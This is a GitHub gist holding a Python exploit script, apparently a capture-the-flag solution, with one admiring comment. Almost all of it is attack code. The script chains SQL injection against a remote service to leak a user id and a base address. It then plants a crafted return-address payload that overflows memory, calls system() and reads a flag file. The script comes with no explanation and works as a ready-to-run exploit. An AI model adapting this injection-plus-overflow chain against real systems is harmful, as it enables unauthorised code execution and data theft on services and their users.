Instantly share code, notes, and snippets.

Embed
What would you like to do?
import random
import socket
import string
import sys
import time
from binascii import hexlify
from binascii import unhexlify
def make_address(offset, address):
return unhexlify("%016x" % (offset + address))[::-1]
HOST = '88.198.89.199'
PORT = 1234
system_address = -0xebace0
# Connect
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
s.settimeout(2)
s.recv(1024)
# Generate user
username = ''.join([random.choice(string.ascii_letters + string.digits) for i in range(16)])
# Register
s.sendall("register %s %s\n" % (username, username))
s.recv(1024)
# Login
s.sendall("login %s %s\n" % (username, username))
s.recv(1024)
# Leak userid
s.sendall("search x' union select id from users where name='%s'#\n" % (username))
s.recv(1024)
s.sendall("show 0\n")
userid = int(s.recv(1024)[3:])
# print "Userid: %d" % userid
# Leak base address
s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(14)#\n")
s.recv(1024)
s.sendall("show 11\n")
s.recv(4)
offset = int(hexlify(s.recv(6)[::-1]), 16) - 0x19d0
# print "Base address: 0x%x" % offset
s.recv(1024)
# Add dummy value and payload
payload = '\x00' * 56 + '\x02' + '\x00' * 7
payload += make_address(offset, 0x223d)
payload += make_address(offset, 0x2238)
payload += make_address(offset, system_address)
payload += make_address(offset, 0x223d)
payload = hexlify(payload)
s.sendall("add dummy'), (%s, unhex('%s'))##" % (userid, payload))
s.recv(1024)
# Overflow payload to 0x203d68
s.sendall("search x' union select table_name from information_schema.tables limit 10 union select char(10) union select content from todos where user=%s#\n" % userid)
s.recv(1024)
# Test
s.sendall("add cat /home/user/flag\n")
print s.recv(1024)
@hellman

This comment has been minimized.

hellman commented Jan 1, 2014

nice exploit!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment